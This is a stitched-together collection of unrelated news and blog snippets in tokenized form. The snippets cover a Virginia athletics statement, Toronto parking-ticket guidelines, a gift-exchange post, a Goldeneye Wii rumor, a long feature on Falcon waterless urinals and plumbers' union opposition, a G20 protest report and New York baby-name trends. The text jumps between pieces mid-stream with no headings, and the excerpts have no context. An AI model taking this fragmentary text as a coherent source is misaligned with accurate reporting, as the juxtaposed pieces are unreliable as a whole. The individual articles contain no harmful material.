In a news conference Monday , Virginia ’s athletic director , Craig Littlepage , said Love was described by her teammates as “ an angel . ”
He said that no decision had been made on the future of each team .
Tuesday is the final day of classes at Virginia , with a reading day Wednesday and final exams beginning Thursday .
Dom Starsia , the Virginia men ’s lacrosse coach , met with his team on Monday afternoon and delivered the general message of not being afraid to seek help .
If you received a parking ticket in Toronto , it ’s not a problem if you ’re religious .
All you have to do is get a note from your pastor and you do n’t have to pay the fine .
That ’s one of the revelations discovered when the Toronto city council “ voted to release the holy grail of how - tos : the Parking Ticket Cancellation Guidelines . ”
Here ’s the portion in question :
So atheists are out of luck .
You ’re stuck with your parking ticket .
It ’s Canada , so someone else can let us know whether that ’s legal or not , but it certainly privileges people of faith .
( Thanks to Not Guilty for the link )
I love my gifts !
I can tell that my gifter did some research on me ...
So what I got
There was an awesome hat ( I love hats ) and it was filled with balloons ( itty bitty balloons ) .
There is a poem book by a local writer named David Peniston , it 's a collection of drawings , short stories and poems based from dreams .
There was a CD with music from the Hungarian state orchestra , a pair of lovely earrings and a booklet from the San Francisco Bay Guardian " Explore SF " that breaks down all of the districts of San Francisco with some awesome things to do !
They also drew little hearts in " Tia - Marie " where my i dots are ( which I thought was cute ) .
My gifter lives near me , I want to buy you a beer while wearing my hat & earrings .
This clip apparently showed up on IGN 's YouTube page earlier today before being swiftly pulled .
It looks like it's for a new Goldeneye game for the Wii .
But hey , you can never be sure .
It certainly feels real , right down to the " Daniel Craig as James Bond " part at the end , but hardcore fans are probably so sick of hearing rumours about this they 're forgiven for being sceptical .
Advertisement
It would obviously be part of Activision 's E3 press conference tomorrow morning , so we wo n't have long to wait to find out whether it 's real or not .
[ thanks meppi @ NeoGAF ]
In a laboratory 10 miles east of downtown Los Angeles , a mechanical penis sputters to life .
A technician starts a timer as a stream of water erupts from the apparatus 's brass tip , arcing into a urinal mounted exactly 12 inches away .
James Krug smiles .
His latest back - splatter experiment is under way .
Krug is an unusual entrepreneur .
Twenty years ago , he was a rising star in the film and television business .
He served as a vice president of the Disney Channel in the 1980s and ran a distribution company with members of the Disney family in the '90s .
But 11 years ago , Krug became convinced that the world did not need another TV show .
What it needed was a better urinal .
His transformation from Hollywood player to urinal evangelist began in 1999 at the Universal Studios Hilton in LA .
A business acquaintance of Krug knew that he was interested in exploring new opportunities and arranged a meeting with Ditmar Gorges , a German engineer who fervently believed that flushing a urinal was a waste of water .
Sitting in the Hilton lobby , Gorges gushed potty talk .
He explained that he had invented a water - free urinal and pointed out that urine was already liquid — and a generally sterile liquid at that .
Gravity could drain it completely .
No flush necessary .
Krug immediately grasped the implications :
The German 's humble innovation had the potential to save millions of gallons of water at a time when demand for the natural resource was draining aquifers dry .
It would do more than any film or TV show to solve a pressing problem .
Krug decided to help .
Drawing on sales skills he'd honed at the Cannes Film Festival , Krug dived into the bathroom business .
He formed Falcon Waterfree Technologies with Gorges and explained to anyone who would listen that the water - free urinal would save more than just water :
In California , a fifth of the electrical output was consumed by processing and pumping water .
Cutting water usage would reduce our carbon footprint .
Falcon was n't the first to develop a waterless urinal .
A company near San Diego had been struggling to sell them since 1991 .
But Krug made a conceptual breakthrough :
The real profits would n't come from the urinals themselves .
They 'd come from selling the replaceable cartridges that sat in each of the waterless receptacles .
In a traditional urinal , water pools in the drain after every flush , preventing sewer gases from escaping into living areas .
Gorges ' invention employed a plastic cartridge filled with a liquid sealant .
Urine could pass through , but sewer gases remained trapped beneath the sealant — no water needed .
The $ 40 cartridge had to be replaced after 7,000 uses , turning a onetime urinal purchase into a perpetual income stream .
Krug 's business model took a page out of the Gillette playbook : Keep the urinal cost low and lock customers in to buying the cartridges .
He quickly won converts .
Cable tycoon Marc Nathanson made a substantial investment in early 2000 , and in 2001 Falcon began to manufacture its urinal , dubbed the U1P .
Soon Al Gore signed on as an adviser , and in 2006 , Jeff Skoll , the first president of eBay , made a significant investment .
Krug was sure the world was ready for a better bowl — there had n't been any major advances in urinal technology for decades — but there was something he was n't prepared for : the plumbers .
Mike Massey did n't like Krug 's urinal .
As head of PIPE , a plumbing union advocacy group in Southern California , Massey looks out for plumbers ' interests .
And as far as he was concerned , the waterless urinal was a threat to public health .
Diseases might fester because the urinals were n't being washed down with every use .
Sewer gases might leak through the cartridge .
" People take plumbing for granted , " Massey says .
" But the reality is that plumbers protect the health of the nation .
That 's how we think of our job . "
Plumbing codes never contemplated a urinal without water .
As a result , Falcon 's fixtures could n't be installed legally in most parts of the country .
Krug assumed it would be a routine matter to amend the model codes on which most state and city codes are based , but Massey and other plumbers began to argue vehemently against it .
The reason the urinal had n't changed in decades was because it worked , they argued .
Urine could be dangerous , Massey said , and the urinal was not something to trifle with .
As a result , in 2003 the organizations that administer the two dominant model codes in the US rejected Falcon 's request to permit installation of waterless urinals .
" The plumbers blindsided us , " Krug says .
" We did n't understand what we were up against . "
Krug scrambled to counter the plumbers ' public health claims .
He hired Charles Gerba , a professor of environmental microbiology at the University of Arizona .
Gerba studies " filth , pestilence , and disease , " with an emphasis on the bathroom , and says he has done more field studies on the toilet than anyone else in academia .
From his point of view , there was a clear explanation for the plumbers ' resistance :
It drained their wallets .
" Plumbers do n't like the waterless urinal because it cuts down on their work tremendously , " he says .
" There 's no more piping to install , and the urinals have no moving parts to repair . "
To test the plumbers ' assertions , Gerba compared a traditional flush urinal with the Falcon waterless .
He found that the Falcon urinal presented a less hospitable environment for germs than constantly moistened conventional bowls .
The process of flushing could actually eject those germs into the air .
" If it 's a traditional urinal , you should flush and run , " Gerba says .
The plumbers reject the contention that their opposition was an attempt to protect their livelihoods .
" We just were n't so sure this was a good product , " Massey says .
" People think we 're a bunch of dumb plumbers , but we 're actually quite sophisticated . "
To buttress their health claims , plumbing unions in California hired Phyllis Fox , an environmental engineer and water quality specialist .
She conducted her own analysis , which involved visiting men's rooms to acquaint herself with the subject matter .
Fox did n't perform any tests , but by examining the designs of the Falcon and other waterless urinals , she concluded that hydrogen sulfide gases in the sewer lines could escape when the cartridges were replaced , resulting in " unconsciousness , respiratory paralysis , and death . "
In other words , the waterless urinal could kill .
How It Does n't Flush
Falcon Waterfree Technologies holds eight patents on its urinal .
Here 's how it works .
1 Instead of being flushed down with as much as a gallon of water , urine simply drains through openings in a specially designed plastic cartridge at the bottom of the bowl .
2 The entry chamber contains a blue liquid — a lighter - than - urine long - chain fatty alcohol .
Gravity pulls urine through the liquid , but odors and sewer gases are trapped below .
3 As the urine descends through the cartridge chamber , its flow collides with a barrier , which prevents turbulence from displacing the floating sealant .
4 Urine passes beneath the barrier and into the exit chamber .
When the urine level reaches the height of the drain , it spills over and empties into the outbound sewer pipe .
Illustration : Peter Grundy
Krug was forced to alter his strategy .
With the path to rewriting the model codes blocked , he began to wage a city - by - city assault .
He hired Daniel Gleiberman , a governmental affairs specialist , to convince local authorities that Falcon 's urinals were safe .
In 2003 , Gleiberman helped persuade officials in Allegheny County , Pennsylvania , to grant a limited exception to their plumbing code .
As a result , Falcon was able to begin selling its urinals to St. Clair Hospital in Pittsburgh .
Those units have been in operation since 2004 .
So far , there have been no urinal - related deaths .
Gleiberman began to win exceptions across the country .
The military agreed to test the urinals at Fort Huachucha , a base in water - strapped southern Arizona .
Craig Hansen , the base 's energy engineering technician , decided to retrofit all 740 of his urinals over the objection of local plumbers .
" The plumbers felt that these things were a threat to their livelihood , " Hansen says .
" They do n't like change . "
The soldiers at the base did n't like the change either .
Hansen heard a flood of complaints early on : The urinals stank .
They were dirty .
Where was the flush handle ?
In one building , the complaints were so vociferous that Hansen started an investigation .
He found that the bathrooms did indeed stink , but the urinals appeared clean .
He suspected there was something else going on and decided a little experiment might flush out the problem .
He bought a smoke bomb , lit the fuse , dropped it down the main sewer line , and waited .
Theoretically , the smoke should not have entered the building .
Plumbers install a U - shaped drain in every sink , toilet , shower , and bath so the pooled water in the U — called the trap — blocks sewer gases from escaping .
But suddenly , smoke filled the building .
Something was very wrong .
Hansen observed that the sewer vent outside the building was placed directly in front of the structure 's air intake .
Smoke flowed out of the vent and was immediately sucked back into the building .
He also found a cracked toilet in the women 's rest room that spewed smoke .
The urinals , however , emitted nothing .
The cartridges were doing their job .
Hansen moved the sewer vent and replaced the cracked toilet .
The complaints stopped .
Hansen concluded that the smell had always been there , but people did n't have anything to blame it on until the new urinals arrived .
The flushless urinals cut water consumption dramatically at the base .
Hansen figures he saves millions of gallons of water , offsetting the cost of the cartridges .
The US Army Corp of Engineers took notice and mandated in 2006 that the Army install only waterless urinals from 2010 onward .
Coral von Zumwalt
From the start , the plumbers came out swinging .
When the Los Angeles City Council met to consider approval of waterless urinals in 2003 , Massey and others showed up to protest .
One even donned germ - fighting gloves and a face mask .
In light of this opposition , the council tabled the issue .
Massey did n't let up .
He hired a lobbyist , and unions across the country were organizing against the urinals .
In 2006 , Plumbers Union Local 690 in Philadelphia and other plumbing and contractors ' associations took out a full - page ad in the Northeast Times headlined , " Waterless Urinals — Setting the Record Straight . "
The ad cited Phyllis Fox 's research and concluded , " This is not a union issue ...
Waterless urinals are a threat to the health of this nation . "
That same year , the organization that oversees the Uniform Plumbing Code , one of the two dominant model codes , again rejected Falcon 's proposed amendments .
Since the code is updated only once every three years , Krug would have to wait till 2009 to try again .
Still , Krug and Gleiberman did make progress .
The other dominant set of regulations — the International Plumbing Code — accepted waterless urinals in 2006 .
The IPC serves as a template for about half the country , largely in the east , and Gleiberman says that it 's less influenced by the unions .
With IPC approval , Krug was finally able to start marketing his product broadly .
Massey knew that Falcon was a formidable opponent .
He had researched the company 's directors and learned that lead investor Marc Nathanson was a well - connected democrat , a friend of Bill Clinton's , and a billionaire .
" Not a guy to pick a fight with , " Massey says .
He also knew Al Gore was on the board of advisers , putting Massey in the unusual position of squaring off against traditional Democratic party allies .
Massey was beginning to see the writing on the bathroom wall .
Gore 's An Inconvenient Truth was released in 2006 and galvanized the green movement .
Opposition to the waterless urinal was making plumbers look out of step .
They were being painted as antienvironmental at a time when builders increasingly wanted to go green .
Massey concluded that he was on the wrong side of the argument .
By the end of 2006 , he decided to support the urinal 's inclusion in the Uniform Plumbing Code .
But there was a catch .
When the code change was finally approved in 2009 , it stated that water had to be piped to the waterless urinals .
Standard plumbing still has to be done , but the water pipe is simply capped off behind the wall and never used .
Krug thought the new code 's requirement was unnecessary , but he decided not to oppose it .
He had been fighting for eight years and was ready to move on .
" It 's the cost of doing business in the real world , " he says .
Massey argues that the condition makes sense .
If a building owner decides to go back to flush urinals , he 'll blame the plumber if the water is n't already there .
Waterless urinals have since colonized American men's rooms — Krug says he has sold 200,000 , and a sprinkling of competitors have appeared .
Now , after all the heated debate , it 's possible to assess how the urinals function in a variety of environments .
The conclusion : Without proper maintenance , there can be problems .
In July 2007 , the University of Washington in Seattle decided to do a test .
The school had experimented with Falcon and other no-water urinals and wanted to do a thorough study before buying more .
It asked Roger van Gelder , a water conservation consultant and proponent of the urinal technology , to do the evaluation .
Van Gelder recommended installing new drain piping so the experiment could begin with a clean slate .
Six months later , he opened the pipes , which had been installed in a dorm bathroom , and discovered that an oily sludge was significantly blocking the drain lines .
It would n't be long before they clogged entirely .
Falcon recommends pouring a bucket of hot water into its urinals to flush out deposits before putting in a new cartridge .
But van Gelder presumes the dorm 's janitorial staff did n't follow this protocol .
He does n't blame them , he says ; the requirement seems counterintuitive .
If it were a truly waterless urinal , why require periodic flushing , particularly when it's a difficult , backbreaking proposition ?
Van Gelder also took issue with Falcon 's cartridges .
They clogged quickly — sometimes after only 700 uses — and had to be thrown away or recycled .
That 's a lot of plastic refuse , which van Gelder did n't think was very environmentally friendly .
And if a janitor did n't replace a clogged cartridge immediately , a smelly and unsightly mix of urine and blue sealant would pool in the urinal .
The university ended up removing all of the waterless devices , and van Gelder is no longer a believer .
There were problems with Falcon and other waterless urinals elsewhere , too .
Over the past few years , the California EPA headquarters in Sacramento ran into trouble with the no-flush urinals it had installed :
The drain pipes clogged , the urinals stank , and the bathrooms were messy ; the units were removed in February 2010 .
Chicago City Hall and O'Hare International Airport have also removed their waterless urinals , citing clogged pipes .
" That 's why it makes sense to plumb water to these things , " says Jim Majerowicz , a Chicago plumber who examined the O'Hare installation .
" It 's about saving money for the building owner when they decide to pull these stinky things out . "
Krug counters that the urinals are working in large - scale facilities across the country — they 're a fixture at Rose Bowl Stadium and Las Vegas Motor Speedway .
They just have to be maintained properly .
" It does require a little bit of retraining , " says Gaylon Holland , director of maintenance operations for the Temecula Valley Unified School District in Southern California .
Holland has installed some 650 Falcon urinals over the past few years and says he had to teach his crew how to take care of them .
The effort paid off : Maintenance costs have gone down , and the district is saving huge quantities of water .
" Everybody was scared of them at first , " Holland says .
" But they work , and they work well . "
Krug says the industry is turning a corner .
" People think a urinal is a urinal , " he says .
" I thought it was a market ripe for innovation , but it has taken an extraordinary effort to get our little urinal on walls . "
With sales continuing to climb — the total number of flushless urinals installed has more than doubled over the past four years — Krug thinks he can finally put a decade of controversy behind him and focus on exploring new ideas at his urinal laboratory east of Los Angeles .
He 's particularly excited about his latest design , the F - 7000 , which features a patent - pending splash - reducing shape .
" Nobody wants a wet pant leg , " he says .
Contributing editor Joshua Davis
( www.joshuadavis.net) wrote about Avatar director James Cameron in issue 17.12 .
by Vancouver Media Co-op
Instead of taking his one year old son fishing and berry picking this weekend , Mel Bazil has come to Toronto to join the rising chorus of dissent against the G20 .
“ I ’m spending time away from my laws , opposing this , ” said Bazil , a member of the Wet 'suwet 'en Nation .
“ I should n’t have to be here . ”
Bazil and his people are fighting to uphold their laws and keep their lands free from a series of proposed oil pipelines , which would carry tar sands crude to the B.C. coast .
Wet 'suwet 'en lands , which were never ceded to the British or to the Canadian government , span 22,000 square kilometers in central British Columbia .
Today , Bazil joined with hundreds of people as they took a “ Toxic Tour ” through the streets of Toronto .
Led by grassroots organizers , marchers joined to demand an end to false solutions to the climate and environmental crises .
Notably absent from the rally was Greenpeace , which has come under fire for the recently announced Canadian Boreal Forest Agreement .
Negotiated in secret , the agreement between nine environmental organizations and 21 forestry companies , the CBFA has added another burden on Indigenous people who are organizing to defend their land .
“ Why is the onus on our communities to catch up ? ” asked Bazil , as the march paused in front of the Royal Bank of Canada .
“ We have to know so much about pipelines , we have to know about the mining , and all of a sudden we have to catch up with the NGOs , ” he said .
Some of the parties to the deal , like Forest Ethics , had already lost trust in Wet 'suwet 'en country , says Bazil , but for Greenpeace to be involved in the CBFA presents a blow to on the ground organizing .
Bazil had been involved in organizing against the proposed pipelines with members of Greenpeace , but he says the CBFA has created a rift in that organizing .
“ This top down approach is messing with a lot of people , not just us as Indigenous peoples , but the Greenpeace workers , the grassroots ground staff , the foot soldiers , ” he said .
“ We want them there , we want them to fly their flags at our events …
But this top down approach , making agreements with forestry companies …
It ’s a farce , it ’s a danger , ” he said .
Curious as to why tens of thousands are protesting the G8 / G20 summits ?
Go to 2010.mediacoop.ca for up to the minute G20 and G8 Summit Protest Reporting , straight ' outta the Alternative Media Centre !
It is not news that the ethnic makeup of New York City is changing and has been for decades .
But the effects this has on the names of the city 's newborns can be dramatic , and surprising .
" When you look at the incredible diversity of the top of the New York naming list , " said Laura Wattenberg , author of " The Baby Name Wizard " ( Broadway Books , 2005 ) , " there are two different phenomena working together .
There is the rising diversity of the population and the willingness to use names from your ethnic background rather than adopting an Anglo name , which is a change from past generations .
At the same time , there is a fall of the usage of the Anglo - Christian classics . "
Names speak to parents ' aspirations for their children .
Everyone has one , and , of course , they are free , said Stanley Lieberson , a Harvard sociology professor who wrote " A Matter of Taste : How Names , Fashions and Culture Change " ( Yale , 2000 ) .
And because few special interest groups have anything to gain in baby name selection , " It 's clean from commercial influences and not simply a reflection of affluence , " Professor Lieberson said .
According to the names released yesterday , Michael and Emily still hang on to their top positions , with Daniel and Ashley close behind .
However , there were differences across groups , with Emily the most popular name among Asian - Americans , Ashley the top name for Hispanics , Kayla among blacks and Sarah for whites .
And , just for the record , there were 27 Katrinas born last year , placing the name out of the top 300 .
But look more deeply into the list , beyond the Top 10 , and the ebb and flow of changes over the years becomes more apparent .
Religion is far and away the biggest influence on names around the world .
Some of that is reflected in New York City , which attracts a wide cross section of Catholics , Jews , Muslims and Hindus , all of whom have strong religious naming traditions .
